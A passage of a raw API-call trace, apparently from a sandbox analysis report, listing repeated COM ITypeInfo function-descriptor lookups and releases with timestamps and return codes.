(in: This=0x7f723a0, index=0x7e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.233] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x7f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.233] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x80, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x81, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x82, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x83, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x84, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x85, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x86, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x87, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x88, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x89, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x8f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x90, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.234] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x91, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.234] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x92, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x93, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x94, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x95, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x96, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x97, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x98, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x99, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9a, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9b, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9c, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9d, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9e, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0x9f, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa0, ppFuncDesc=0x206318, pDummy=0x80 | out: ppFuncDesc=0x206318, pDummy=0x80) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x21033e0001 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa1, ppFuncDesc=0x206318, pDummy=0x22016a0079 | out: ppFuncDesc=0x206318, pDummy=0x22016a0079) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa2, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa3, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.235] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.235] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa4, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa5, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa6, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa7, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa8, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xa9, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaa, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xab, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xac, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xad, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xae, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xaf, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb0, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb1, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb2, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb3, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb4, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb5, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb6, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb7, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb8, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xb9, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.236] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.236] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xba, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbb, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbc, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbd, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbe, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xbf, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc0, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc1, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc2, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc3, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc4, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc5, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc6, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc7, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc8, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xc9, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xca, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcb, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcc, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.237] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcd, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.237] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xce, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xcf, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd0, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd1, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd2, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd3, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd4, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd5, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd6, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd7, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd8, ppFuncDesc=0x206318, pDummy=0x140 | out: ppFuncDesc=0x206318, pDummy=0x140) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xd9, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xda, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdb, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdc, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdd, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xde, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xdf, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.238] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.238] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe0, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe1, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe2, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe3, ppFuncDesc=0x206318, pDummy=0x100 | out: ppFuncDesc=0x206318, pDummy=0x100) returned 0x0 [0045.239] ITypeInfo:LocalReleaseFuncDesc (This=0x7f723a0) returned 0x0 [0045.239] ITypeInfo:RemoteGetFuncDesc (in: This=0x7f723a0, index=0xe4, 